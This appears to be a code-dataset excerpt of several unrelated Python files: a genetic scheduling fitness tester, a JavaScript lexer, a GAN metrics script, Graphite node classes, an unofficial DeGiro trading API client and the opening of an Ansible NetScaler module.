hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ba800bf3fafd4d1117b5751ba64320b7d4c9cfab
| 4,794
|
py
|
Python
|
genetics/fitnessTest.py
|
TeamAbstract/GeneticScheduling
|
8c2830b595c8389af372d9fbf02abed2ea2cfa5c
|
[
"Apache-2.0"
] | null | null | null |
genetics/fitnessTest.py
|
TeamAbstract/GeneticScheduling
|
8c2830b595c8389af372d9fbf02abed2ea2cfa5c
|
[
"Apache-2.0"
] | 6
|
2015-02-27T14:27:52.000Z
|
2016-01-14T11:11:15.000Z
|
genetics/fitnessTest.py
|
TeamAbstract/GeneticScheduling
|
8c2830b595c8389af372d9fbf02abed2ea2cfa5c
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime as DateTime
from genetics.genepool import GenePool
from vessels import Vessels
from schedule import Schedule
import util
import settings
class FitnessTest:
# Weighting #TODO fine tune weighting
bonusPerHourTillDeadline = 5
penaltyPerHourOverDeadline = -10
penaltyPerHourOverlapping = -5
penaltyPerHourIdle = -2
totalTimeWeight = -1
penaltyForOutOfHours = -10
percentageTimeUsedWeight = 5
startTime = DateTime.now()
@staticmethod
def testPool(genepool):
"""! tests every schedule in the genePool that is passed to it
:param genepool: genepool containing the schedules to be tested
:type genepool: GenePool
"""
assert isinstance(genepool, GenePool)
# print("Testing ", len(genepool.schedules), " schedules")
for schedule in genepool.schedules:
FitnessTest.testSchedule(schedule)
@staticmethod
def testSchedule(schedule):
# TODO more requirements
"""
Tests a single schedule for it's fitness
:param schedule: schedule to be tested
:type schedule: Schedule
"""
# print("Testing schedule ", schedule.id)
fitness = 100
schedule.flags = set()
fitness += FitnessTest.timeToDeadline(schedule)
fitness += FitnessTest.isOverDeadline(schedule)
fitness += FitnessTest.isOverlapping(schedule)
fitness += FitnessTest.checkIdleVessels(schedule)
fitness += FitnessTest.testTotalTime(schedule)
fitness += FitnessTest.testOutOfHours(schedule)
fitness += FitnessTest.testPercentageUsed(schedule)
# print("score of ", fitness)
schedule.fitness = fitness
@staticmethod
def timeToDeadline(schedule):
score = 0
for task in schedule.tasks:
if task.product.dueDate is None:
continue
dTime = util.addDateTimeAndTime(task.getEndTime(), task.coolDown) - task.product.dueDate
score += util.getTotalHours(dTime) * FitnessTest.bonusPerHourTillDeadline
return score
@staticmethod
def isOverDeadline(schedule):
score = 0
for task in schedule.tasks:
if task.product.dueDate is None:
continue
dTime = util.addDateTimeAndTime(task.getEndTime(), task.coolDown) - task.product.dueDate
partialScore = util.getTotalHours(dTime) * FitnessTest.penaltyPerHourOverDeadline
if partialScore > 0:
score += partialScore
return score
@staticmethod
def isOverlapping(schedule):
"""! Tests if tasks on a schedule are overlapping
:param schedule: schedule to test
:type schedule: Schedule
:return: score
"""
score = 0
for index, task in enumerate(schedule.tasks[:-1]):
for otherTask in schedule.tasks[index:]:
if task.getEndTime() <= otherTask.startTime: # if no overlap
continue
schedule.flags.add("Olap")
hoursOverlapping = otherTask.getEndTime() - task.startTime
score += util.getTotalHours(hoursOverlapping) * FitnessTest.penaltyPerHourOverlapping
return score
@staticmethod
def checkIdleVessels(schedule):
score = 0
for vessel in Vessels.vessels:
timeCurrent = None
for task in schedule.tasks:
if task.vessel == vessel:
if timeCurrent is None:
timeCurrent = task.getEndTime() + task.cleanTime
else:
score += util.getTotalHours(task.startTime - timeCurrent) * FitnessTest.penaltyPerHourIdle
return score
@staticmethod
def testTotalTime(schedule):
"""! return total time that the schedule uses including brewtime and cleaning
:param schedule: schedule to test
:type schedule: Schedule
:return: score from test
"""
assert isinstance(schedule, Schedule)
return util.getTotalHours(schedule.getTotalTime()) * FitnessTest.totalTimeWeight
@staticmethod
def testPercentageUsed(schedule):
"""! checks what percentage of each vessel's time is spent idle
:param schedule: schedule to test
:type schedule: Schedule
:return: score from test
"""
lastTask = schedule.tasks[0]
for task in schedule.tasks[1:]:
if task.getEndTime() > lastTask.getEndTime():
lastTask = task
totalTime = util.getTotalHours(schedule.getTotalTime())/len(Vessels.vessels)
timeToEnd = util.getTotalHours(lastTask.getEndTime() - FitnessTest.startTime)
return (timeToEnd/totalTime) * FitnessTest.percentageTimeUsedWeight
@staticmethod
def testOutOfHours(schedule):
"""! Check if the schedule has anything finishing out of hours
:param schedule: schedule to test
:type schedule: Schedule
:return: score from test
"""
assert isinstance(schedule, Schedule)
score = 0
for task in schedule.tasks:
if not settings.openingTime < task.startTime.time() < settings.closingTime:
score += FitnessTest.penaltyForOutOfHours
schedule.flags.add("outHs") # out of hours start
if not settings.openingTime < task.getEndTime().time() < settings.closingTime:
score += FitnessTest.penaltyForOutOfHours
schedule.flags.add("outHe") # out of hours end
return score
| 29.411043
| 96
| 0.744472
|
ac9ef7f3ffeda6b7c1fde06d4515dfa110d65ba2
| 4,004
|
py
|
Python
|
jsparser/lexer.py
|
sandin/JSParser
|
1b894d5be90e8a0669f1d730a05cf4cf40509e60
|
[
"Apache-2.0"
] | 1
|
2021-11-01T01:50:39.000Z
|
2021-11-01T01:50:39.000Z
|
jsparser/lexer.py
|
sandin/JSParser
|
1b894d5be90e8a0669f1d730a05cf4cf40509e60
|
[
"Apache-2.0"
] | null | null | null |
jsparser/lexer.py
|
sandin/JSParser
|
1b894d5be90e8a0669f1d730a05cf4cf40509e60
|
[
"Apache-2.0"
] | null | null | null |
import enum
g_last_char: str = ' '
g_identifier_str: str = None
g_number_val: float = 0
g_cur_token = None
def reset():
global g_last_char, g_identifier_str, g_number_val, g_cur_token
g_last_char = ' '
g_identifier_str = None
g_number_val = 0
g_cur_token = None
class Token(enum.IntEnum):
EOF = -1
IDENTIFIER = -2
NUMBER = -3
NEW_LINE = -4
# keywords:
FUNCTION = -5
RETURN = -6
VAR = -7
IF = -8
THEN = -9
ELSE = -10
#BLOCK = -11
#PAREN = -12
g_keywords = {
"function": Token.FUNCTION,
"return": Token.RETURN,
"var": Token.VAR,
"if": Token.IF,
"else": Token.ELSE
}
class StringBuffer(object):
def __init__(self, value):
self._value = value
self._index = 0
self._length = len(value)
def getchar(self, peek = False):
if self._index < self._length:
c = self._value[self._index]
if not peek:
self._index += 1
return c
return None # EOF
def eof(self):
return self._index == self._length - 1
def curline(self):
start_index = self._index
c = self._value[start_index]
while c != "\r" and c != "\n" and start_index > 0:
c = self._value[start_index]
start_index -= 1
if start_index > 0:
start_index += 1 # skip the nl
end_index = self._index
c = self._value[end_index]
while c != "\r" and c != "\n" and end_index < self._length:
c = self._value[end_index]
end_index += 1
return self._value[start_index:end_index]
def get_token(code: StringBuffer):
global g_last_char, g_identifier_str, g_number_val
# skip the whitespace
while g_last_char and g_last_char.isspace():
g_last_char = code.getchar()
if g_last_char is None: # EOF
return Token.EOF
if g_last_char.isalpha() or g_last_char == "_": # identifier: [a-zA-Z][a-zA-Z0-9]*
g_identifier_str = g_last_char
g_last_char = code.getchar()
while g_last_char.isalnum() or g_last_char == "_":
g_identifier_str += g_last_char
g_last_char = code.getchar()
if g_identifier_str in g_keywords:
return g_keywords[g_identifier_str]
return Token.IDENTIFIER
if g_last_char.isdigit(): # Number: [0-9.]
num_str = g_last_char
g_last_char = code.getchar()
while g_last_char.isdigit() or g_last_char == ".":
num_str += g_last_char
g_last_char = code.getchar()
g_number_val = float(num_str)
return Token.NUMBER
if g_last_char == "/":
next_char = code.getchar(peek=True)
if next_char == "/": # // comment util end of line
code.getchar() # eat '//'
g_last_char = code.getchar()
while g_last_char and g_last_char != "\n" and g_last_char != "\r":
g_last_char = code.getchar()
if g_last_char:
return get_token(code)
if g_last_char == "\r" or g_last_char == "\n" or g_last_char == ";":
print("eat nl", g_last_char)
g_last_char = code.getchar() # eat nl
#while g_last_char == "\r" or g_last_char == "\n" or g_last_char == ";":
# print("eat nl2", g_last_char)
# g_last_char = code.getchar()
return Token.NEW_LINE
#if g_last_char == "{":
# g_last_char = code.getchar() # eat `{`
# return Token.BLOCK
#if g_last_char == "(":
# g_last_char = code.getchar() # eat `(`
# return Token.PAREN
this_char = g_last_char
g_last_char = code.getchar()
return this_char
def get_next_token(code: StringBuffer):
global g_cur_token
g_cur_token = get_token(code)
print("[Token] get_next_token, g_cur_token=%s, g_last_char=%s, g_identifier_str=%s, g_number_val=%d" % (g_cur_token, g_last_char, g_identifier_str, g_number_val))
return g_cur_token
| 28.197183
| 166
| 0.586414
|
d8a1e985680f36bc9afa3d80da767f2fe34abe8e
| 11,308
|
py
|
Python
|
scripts/calc_metrics.py
|
maua-maua-maua/nvGAN
|
edea24c58646780c9fb8ea942e49708ce9d62421
|
[
"MIT"
] | null | null | null |
scripts/calc_metrics.py
|
maua-maua-maua/nvGAN
|
edea24c58646780c9fb8ea942e49708ce9d62421
|
[
"MIT"
] | null | null | null |
scripts/calc_metrics.py
|
maua-maua-maua/nvGAN
|
edea24c58646780c9fb8ea942e49708ce9d62421
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
"""Calculate quality metrics for previous training run or pretrained network pickle."""
import sys; sys.path.extend(['.', 'src'])
import copy
import json
import os
import re
import tempfile
import click
import torch
from omegaconf import OmegaConf
from src import dnnlib
from src.torch_utils import custom_ops, misc, training_stats
import legacy
from metrics import metric_main, metric_utils
#----------------------------------------------------------------------------
def subprocess_fn(rank, args, temp_dir):
dnnlib.util.Logger(should_flush=True)
# Init torch.distributed.
if args.num_gpus > 1:
init_file = os.path.abspath(os.path.join(temp_dir, '.torch_distributed_init'))
if os.name == 'nt':
init_method = 'file:///' + init_file.replace('\\', '/')
torch.distributed.init_process_group(backend='gloo', init_method=init_method, rank=rank, world_size=args.num_gpus)
else:
init_method = f'file://{init_file}'
torch.distributed.init_process_group(backend='nccl', init_method=init_method, rank=rank, world_size=args.num_gpus)
# Init torch_utils.
sync_device = torch.device('cuda', rank) if args.num_gpus > 1 else None
training_stats.init_multiprocessing(rank=rank, sync_device=sync_device)
if rank != 0 or not args.verbose:
custom_ops.verbosity = 'none'
# Print network summary.
device = torch.device('cuda', rank)
torch.backends.cudnn.benchmark = True
torch.backends.cuda.matmul.allow_tf32 = False
torch.backends.cudnn.allow_tf32 = False
G = copy.deepcopy(args.G).eval().requires_grad_(False).to(device)
if rank == 0 and args.verbose:
z = torch.empty([8, G.z_dim], device=device)
c = torch.empty([8, G.c_dim], device=device)
t = torch.zeros([8, G.cfg.sampling.num_frames_per_sample], device=device).long()
l = torch.zeros([8], device=device).float()
misc.print_module_summary(G, dict(z=z, c=c, t=t[:, 0], l=l))
# Calculate each metric.
for metric in args.metrics:
if rank == 0 and args.verbose:
print(f'Calculating {metric}...')
progress = metric_utils.ProgressMonitor(verbose=args.verbose)
result_dict = metric_main.calc_metric(
metric=metric,
G=G,
dataset_kwargs=args.dataset_kwargs,
num_gpus=args.num_gpus,
rank=rank,
device=device,
progress=progress,
cache=args.use_cache,
num_runs=(1 if metric == 'fid50k_full' else args.num_runs),
)
if rank == 0:
metric_main.report_metric(result_dict, run_dir=args.run_dir, snapshot_pkl=args.network_pkl)
if rank == 0 and args.verbose:
print()
# Done.
if rank == 0 and args.verbose:
print('Exiting...')
#----------------------------------------------------------------------------
class CommaSeparatedList(click.ParamType):
name = 'list'
def convert(self, value, param, ctx):
_ = param, ctx
if value is None or value.lower() == 'none' or value == '':
return []
return value.split(',')
#----------------------------------------------------------------------------
@click.command()
@click.pass_context
@click.option('--network_pkl', '--network', help='Network pickle filename or URL', metavar='PATH')
@click.option('--networks_dir', '--networks_dir', help='Path to the experiment directory if the latest checkpoint is requested.', metavar='PATH')
@click.option('--metrics', help='Comma-separated list or "none"', type=CommaSeparatedList(), default='fid50k_full', show_default=True)
@click.option('--data', help='Dataset to evaluate metrics against (directory or zip) [default: same as training data]', metavar='PATH')
@click.option('--mirror', help='Whether the dataset was augmented with x-flips during training [default: look up]', type=bool, metavar='BOOL')
@click.option('--gpus', help='Number of GPUs to use', type=int, default=1, metavar='INT', show_default=True)
@click.option('--cfg_path', help='Path to the experiments config', type=str, default="auto", metavar='PATH')
@click.option('--verbose', help='Print optional information', type=bool, default=False, metavar='BOOL', show_default=True)
@click.option('--use_cache', help='Should we use the cache file?', type=bool, default=True, metavar='BOOL', show_default=True)
@click.option('--num_runs', help='Number of runs', type=int, default=1, metavar='INT', show_default=True)
def calc_metrics(ctx, network_pkl, networks_dir, metrics, data, mirror, gpus, cfg_path, verbose, use_cache: bool, num_runs: int):
"""Calculate quality metrics for previous training run or pretrained network pickle.
Examples:
\b
# Previous training run: look up options automatically, save result to JSONL file.
python calc_metrics.py --metrics=pr50k3_full \\
--network=~/training-runs/00000-ffhq10k-res64-auto1/network-snapshot-000000.pkl
\b
# Pre-trained network pickle: specify dataset explicitly, print result to stdout.
python calc_metrics.py --metrics=fid50k_full --data=~/datasets/ffhq.zip --mirror=1 \\
--network=https://nvlabs-fi-cdn.nvidia.com/stylegan2-ada-pytorch/pretrained/ffhq.pkl
Available metrics:
\b
ADA paper:
fid50k_full Frechet inception distance against the full dataset.
kid50k_full Kernel inception distance against the full dataset.
pr50k3_full Precision and recall againt the full dataset.
is50k Inception score for CIFAR-10.
\b
StyleGAN and StyleGAN2 papers:
fid50k Frechet inception distance against 50k real images.
kid50k Kernel inception distance against 50k real images.
pr50k3 Precision and recall against 50k real images.
ppl2_wend Perceptual path length in W at path endpoints against full image.
ppl_zfull Perceptual path length in Z for full paths against cropped image.
ppl_wfull Perceptual path length in W for full paths against cropped image.
ppl_zend Perceptual path length in Z at path endpoints against cropped image.
ppl_wend Perceptual path length in W at path endpoints against cropped image.
"""
dnnlib.util.Logger(should_flush=True)
if network_pkl is None:
output_regex = "^network-snapshot-\d{6}.pkl$"
ckpt_regex = re.compile("^network-snapshot-\d{6}.pkl$")
# ckpts = sorted([f for f in os.listdir(networks_dir) if ckpt_regex.match(f)])
# network_pkl = os.path.join(networks_dir, ckpts[-1])
metrics_file = os.path.join(networks_dir, 'metric-fvd2048_16f.jsonl')
with open(metrics_file, 'r') as f:
snapshot_metrics_vals = [json.loads(line) for line in f.read().splitlines()]
best_snapshot = sorted(snapshot_metrics_vals, key=lambda m: m['results']['fvd2048_16f'])[0]
network_pkl = os.path.join(networks_dir, best_snapshot['snapshot_pkl'])
print(f'Using checkpoint: {network_pkl} with FVD16 of', best_snapshot['results']['fvd2048_16f'])
# Selecting a checkpoint with the best score
# Validate arguments.
args = dnnlib.EasyDict(metrics=metrics, num_gpus=gpus, network_pkl=network_pkl, verbose=verbose)
if cfg_path == "auto":
# Assuming that `network_pkl` has the structure /path/to/experiment/output/network-X.pkl
output_path = os.path.dirname(network_pkl)
assert os.path.basename(output_path) == "output", f"Unknown path structure: {output_path}"
experiment_path = os.path.dirname(output_path)
cfg_path = os.path.join(experiment_path, 'experiment_config.yaml')
cfg = OmegaConf.load(cfg_path)
if not all(metric_main.is_valid_metric(metric) for metric in args.metrics):
ctx.fail('\n'.join(['--metrics can only contain the following values:'] + metric_main.list_valid_metrics()))
if not args.num_gpus >= 1:
ctx.fail('--gpus must be at least 1')
# Load network.
if not dnnlib.util.is_url(network_pkl, allow_file_urls=True) and not os.path.isfile(network_pkl):
ctx.fail('--network must point to a file or URL')
if args.verbose:
print(f'Loading network from "{network_pkl}"...')
with dnnlib.util.open_url(network_pkl, verbose=args.verbose) as f:
network_dict = legacy.load_network_pkl(f)
args.G = network_dict['G_ema'] # subclass of torch.nn.Module
from src.training.networks import Generator
G = args.G
G.cfg.z_dim = G.z_dim
G_new = Generator(
w_dim=G.cfg.w_dim,
mapping_kwargs=dnnlib.EasyDict(num_layers=G.cfg.get('mapping_net_n_layers', 2), cfg=G.cfg),
synthesis_kwargs=dnnlib.EasyDict(
channel_base=int(G.cfg.get('fmaps', 0.5) * 32768),
channel_max=G.cfg.get('channel_max', 512),
num_fp16_res=4,
conv_clamp=256,
),
cfg=G.cfg,
img_resolution=256,
img_channels=3,
c_dim=G.cfg.c_dim,
).eval()
G_new.load_state_dict(G.state_dict())
args.G = G_new
# Initialize dataset options.
if data is not None:
args.dataset_kwargs = dnnlib.EasyDict(class_name='training.dataset.VideoFramesFolderDataset', cfg=cfg.dataset, path=data)
elif network_dict['training_set_kwargs'] is not None:
args.dataset_kwargs = dnnlib.EasyDict(network_dict['training_set_kwargs'])
else:
ctx.fail('Could not look up dataset options; please specify --data')
# Finalize dataset options.
args.dataset_kwargs.resolution = args.G.img_resolution
args.dataset_kwargs.use_labels = (args.G.c_dim != 0)
if mirror is not None:
args.dataset_kwargs.xflip = mirror
args.use_cache = use_cache
args.num_runs = num_runs
# Print dataset options.
if args.verbose:
print('Dataset options:')
print(cfg.dataset)
# Locate run dir.
args.run_dir = None
if os.path.isfile(network_pkl):
pkl_dir = os.path.dirname(network_pkl)
if os.path.isfile(os.path.join(pkl_dir, 'training_options.json')):
args.run_dir = pkl_dir
# Launch processes.
if args.verbose:
print('Launching processes...')
torch.multiprocessing.set_start_method('spawn')
with tempfile.TemporaryDirectory() as temp_dir:
if args.num_gpus == 1:
subprocess_fn(rank=0, args=args, temp_dir=temp_dir)
else:
torch.multiprocessing.spawn(fn=subprocess_fn, args=(args, temp_dir), nprocs=args.num_gpus)
#----------------------------------------------------------------------------
if __name__ == "__main__":
calc_metrics() # pylint: disable=no-value-for-parameter
#----------------------------------------------------------------------------
| 45.051793
| 145
| 0.653962
|
1900c8f148f0541570397e724a6c6531deb98b2b
| 177
|
py
|
Python
|
run.py
|
hhoosshhii53pinkwest/shiritori
|
d9a2eca72af91a5d0fc948e921d51bb3ed2a15f2
|
[
"MIT"
] | null | null | null |
run.py
|
hhoosshhii53pinkwest/shiritori
|
d9a2eca72af91a5d0fc948e921d51bb3ed2a15f2
|
[
"MIT"
] | null | null | null |
run.py
|
hhoosshhii53pinkwest/shiritori
|
d9a2eca72af91a5d0fc948e921d51bb3ed2a15f2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from slackbot.bot import Bot
def main():
bot = Bot()
bot.run()
if __name__ == "__main__":
print('start slackbot')
main()
| 16.090909
| 29
| 0.525424
|
3b9a8d08f3541e93cee07aa304e8c8a3313755e9
| 10,173
|
py
|
Python
|
degiroapi/__init__.py
|
SilageTime/DegiroAPI
|
b95860ae3286c17cd2e8dbc13ea31a4eb4bcc785
|
[
"MIT"
] | null | null | null |
degiroapi/__init__.py
|
SilageTime/DegiroAPI
|
b95860ae3286c17cd2e8dbc13ea31a4eb4bcc785
|
[
"MIT"
] | null | null | null |
degiroapi/__init__.py
|
SilageTime/DegiroAPI
|
b95860ae3286c17cd2e8dbc13ea31a4eb4bcc785
|
[
"MIT"
] | null | null | null |
import requests
from degiroapi.order import Order
from degiroapi.client_info import ClientInfo
from degiroapi.datatypes import Data
class DeGiro:
__LOGIN_URL = 'https://trader.degiro.nl/login/secure/login'
__LOGOUT_URL = 'https://trader.degiro.nl/trading/secure/logout'
__CLIENT_INFO_URL = 'https://trader.degiro.nl/pa/secure/client'
__GET_STOCKS_URL = 'https://trader.degiro.nl/products_s/secure/v5/stocks'
__PRODUCT_SEARCH_URL = 'https://trader.degiro.nl/product_search/secure/v5/products/lookup'
__TRANSACTIONS_URL = 'https://trader.degiro.nl/reporting/secure/v4/transactions'
__ORDERS_URL = 'https://trader.degiro.nl/reporting/secure/v4/order-history'
__PLACE_ORDER_URL = 'https://trader.degiro.nl/trading/secure/v5/checkOrder'
__CONFIRM_ORDER_URL = 'https://trader.degiro.nl/trading/secure/v5/order/'
__DATA_URL = 'https://trader.degiro.nl/trading/secure/v5/update/'
__GET_REQUEST = 0
__POST_REQUEST = 1
session_id = any
client_info = any
confirmation_id = any
def login(self, username, password):
login_payload = {
'username': username,
'password': password,
'isPassCodeReset': False,
'isRedirectToMobile': False
}
login_response = self.__request(DeGiro.__LOGIN_URL, login_payload, request_type=DeGiro.__POST_REQUEST,
error_message='Could not login.')
self.session_id = login_response['sessionId']
client_info_payload = {'sessionId': self.session_id}
client_info_response = self.__request(DeGiro.__CLIENT_INFO_URL, client_info_payload,
error_message='Could not get client info.')
self.client_info = ClientInfo(client_info_response['data'])
return client_info_response
def logout(self):
logout_payload = {
'intAccount': self.client_info.account_id,
'sessionId': self.session_id,
}
self.__request(DeGiro.__LOGOUT_URL + ';jsessionid=' + self.session_id, logout_payload, error_message='Could not log out')
@staticmethod
def __request(url, payload, post_params=None, request_type=__GET_REQUEST, error_message='An error occurred.'):
if request_type == DeGiro.__GET_REQUEST:
response = requests.get(url, params=payload)
elif request_type == DeGiro.__POST_REQUEST and post_params:
response = requests.post(url, params=post_params, json=payload)
elif request_type == DeGiro.__POST_REQUEST:
response = requests.post(url, json=payload)
else:
raise Exception(f'Unknown request type: {request_type}')
if response.status_code == 200 or response.status_code == 201:
try:
return response.json()
except:
return "No data"
else:
raise Exception(f'{error_message} Response: {response.text}')
def search_products(self, search_text, limit=1):
product_search_payload = {
'searchText': search_text,
'limit': limit,
'offset': 0,
'intAccount': self.client_info.account_id,
'sessionId': self.session_id
}
return \
self.__request(DeGiro.__PRODUCT_SEARCH_URL, product_search_payload,
error_message='Could not get products.')[
'products']
def transactions(self, from_date, to_date, group_transactions=False):
transactions_payload = {
'fromDate': from_date.strftime('%d/%m/%Y'),
'toDate': to_date.strftime('%d/%m/%Y'),
'group_transactions_by_order': group_transactions,
'intAccount': self.client_info.account_id,
'sessionId': self.session_id
}
return \
self.__request(DeGiro.__TRANSACTIONS_URL, transactions_payload,
error_message='Could not get transactions.')[
'data']
def orders(self, from_date, to_date):
orders_payload = {
'fromDate': from_date.strftime('%d/%m/%Y'),
'toDate': to_date.strftime('%d/%m/%Y'),
'intAccount': self.client_info.account_id,
'sessionId': self.session_id
}
# max 90 days
if (to_date - from_date).days > 90:
raise Exception('The maximum timespan is 90 days')
return self.__request(DeGiro.__ORDERS_URL, orders_payload, error_message='Could not get orders.')['data']
@staticmethod
def filtercachfunds(cachfunds):
data = []
for item in cachfunds['cashFunds']['value']:
if item['value'][2]['value'] != 0:
data.append(item['value'][1]['value'] + " " + str(item['value'][2]['value']))
return data
@staticmethod
def filterportfolio(portfolio):
data = []
for item in portfolio['portfolio']['value']:
data.append(item['value'][0]['name'] + " " + str(item['value'][0]['value']) + " , " +
item['value'][1]['name'] + " " + item['value'][1]['value'] + " , " +
item['value'][2]['name'] + " " + str(item['value'][2]['value']) + " , " +
item['value'][3]['name'] + " " + str(item['value'][3]['value']) + " , " +
item['value'][4]['name'] + " " + str(item['value'][4]['value']) + " , " +
item['value'][9]['name'] + " " + str(item['value'][9]['value']))
return data
def getdata(self, datatype):
data_payload = {
datatype: 0
}
if datatype == Data.Type.CACHFUNDS:
return self.filtercachfunds(
self.__request(DeGiro.__DATA_URL + str(self.client_info.account_id) + ';jsessionid=' + self.session_id,
data_payload, error_message='Could not get data'))
elif datatype == Data.Type.PORTFOLIO:
return self.filterportfolio(
self.__request(DeGiro.__DATA_URL + str(self.client_info.account_id) + ';jsessionid=' + self.session_id,
data_payload, error_message='Could not get data'))
else:
return self.__request(
DeGiro.__DATA_URL + str(self.client_info.account_id) + ';jsessionid=' + self.session_id, data_payload, error_message='Could not get data')
def buyorder(self, orderType, productId, timeType, size, limit=None, stop_loss=None):
place_buy_order_params = {
'intAccount': self.client_info.account_id,
'sessionId': self.session_id,
}
place_buy_order_payload = {
'buySell': "BUY",
'orderType': orderType,
'productId': productId,
'timeType': timeType,
'size': size,
'price': limit,
'stopPrice': stop_loss,
}
if orderType != Order.Type.STOPLIMIT and orderType != Order.Type.MARKET \
and orderType != Order.Type.LIMIT and orderType != Order.Type.STOPLOSS:
raise Exception('Invalid order type')
if timeType != 1 and timeType != 3:
raise Exception('Invalid time type')
place_check_order_response = self.__request(DeGiro.__PLACE_ORDER_URL + ';jsessionid=' + self.session_id,
place_buy_order_payload, place_buy_order_params,
request_type=DeGiro.__POST_REQUEST,
error_message='Could not place order')
self.confirmation_id = place_check_order_response['data']['confirmationId']
self.__request(DeGiro.__CONFIRM_ORDER_URL + self.confirmation_id + ';jsessionid=' + self.session_id,
place_buy_order_payload, place_buy_order_params, request_type=DeGiro.__POST_REQUEST,
error_message='Could not confirm order')
def sellorder(self, orderType, productId, timeType, size, limit=None, stop_loss=None):
place_sell_order_params = {
'intAccount': self.client_info.account_id,
'sessionId': self.session_id,
}
place_sell_order_payload = {
'buySell': "SELL",
'orderType': orderType,
'productId': productId,
'timeType': timeType,
'size': size,
'price': limit,
'stopPrice': stop_loss,
}
if orderType != Order.Type.STOPLIMIT and orderType != Order.Type.MARKET \
and orderType != Order.Type.LIMIT and orderType != Order.Type.STOPLOSS:
raise Exception('Invalid order type')
if timeType != 1 and timeType != 3:
raise Exception('Invalid time type')
place_check_order_response = self.__request(DeGiro.__PLACE_ORDER_URL + ';jsessionid=' + self.session_id,
place_sell_order_payload, place_sell_order_params,
request_type=DeGiro.__POST_REQUEST,
error_message='Could not place order')
self.confirmation_id = place_check_order_response['data']['confirmationId']
self.__request(DeGiro.__CONFIRM_ORDER_URL + self.confirmation_id + ';jsessionid=' + self.session_id,
place_sell_order_payload, place_sell_order_params, request_type=DeGiro.__POST_REQUEST,
error_message='Could not confirm order')
def get_stock_list(self, indexId, stockCountryId):
stock_list_params = {
'indexId': indexId,
'stockCountryId': stockCountryId,
'offset': 0,
'limit': None,
'requireTotal': "true",
'sortColumns': "name",
'sortTypes': "asc",
'intAccount': self.client_info.account_id,
'sessionId': self.session_id
}
return self.__request(DeGiro.__GET_STOCKS_URL, stock_list_params, error_message='Could not get stock list')[
'products']
| 45.415179
| 154
| 0.588322
|
8e70ac502181662d1f6f44e013914a16620e8d51
| 745
|
py
|
Python
|
webapp/graphite/node.py
|
chicagobuss/graphite-web
|
8f13d44d446acfaecefb438f1f4b8f56e5164092
|
[
"Apache-2.0"
] | 2
|
2015-05-01T07:48:42.000Z
|
2019-06-17T18:55:55.000Z
|
webapp/graphite/node.py
|
kamaradclimber/graphite-web
|
522d84fed687bd946878e48d85982d59f7bd1267
|
[
"Apache-2.0"
] | 2
|
2021-06-10T19:24:59.000Z
|
2022-02-11T03:39:33.000Z
|
webapp/graphite/node.py
|
kamaradclimber/graphite-web
|
522d84fed687bd946878e48d85982d59f7bd1267
|
[
"Apache-2.0"
] | 13
|
2017-01-12T11:07:22.000Z
|
2019-04-19T09:55:52.000Z
|
class Node(object):
__slots__ = ('name', 'path', 'local', 'is_leaf')
def __init__(self, path):
self.path = path
self.name = path.split('.')[-1]
self.local = True
self.is_leaf = False
def __repr__(self):
return '<%s[%x]: %s>' % (self.__class__.__name__, id(self), self.path)
class BranchNode(Node):
pass
class LeafNode(Node):
__slots__ = ('reader', 'intervals')
def __init__(self, path, reader):
Node.__init__(self, path)
self.reader = reader
self.intervals = reader.get_intervals()
self.is_leaf = True
def fetch(self, startTime, endTime):
return self.reader.fetch(startTime, endTime)
def __repr__(self):
return '<LeafNode[%x]: %s (%s)>' % (id(self), self.path, self.reader)
| 21.911765
| 74
| 0.636242
|
43d1f593d8d4326a55321cbb9249f82ff4edd488
| 11,855
|
py
|
Python
|
virt/ansible-latest/lib/python2.7/site-packages/ansible/modules/network/netscaler/netscaler_ssl_certkey.py
|
lakhlaifi/RedHat-Ansible
|
27c5077cced9d416081fcd5d69ea44bca0317fa4
|
[
"Apache-2.0"
] | 1
|
2020-03-29T18:41:01.000Z
|
2020-03-29T18:41:01.000Z
|
ansible/ansible/modules/network/netscaler/netscaler_ssl_certkey.py
|
SergeyCherepanov/ansible
|
875711cd2fd6b783c812241c2ed7a954bf6f670f
|
[
"MIT"
] | 7
|
2020-09-07T17:27:56.000Z
|
2022-03-02T06:25:46.000Z
|
ansible/ansible/modules/network/netscaler/netscaler_ssl_certkey.py
|
SergeyCherepanov/ansible
|
875711cd2fd6b783c812241c2ed7a954bf6f670f
|
[
"MIT"
] | 1
|
2020-10-30T12:48:24.000Z
|
2020-10-30T12:48:24.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Citrix Systems
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
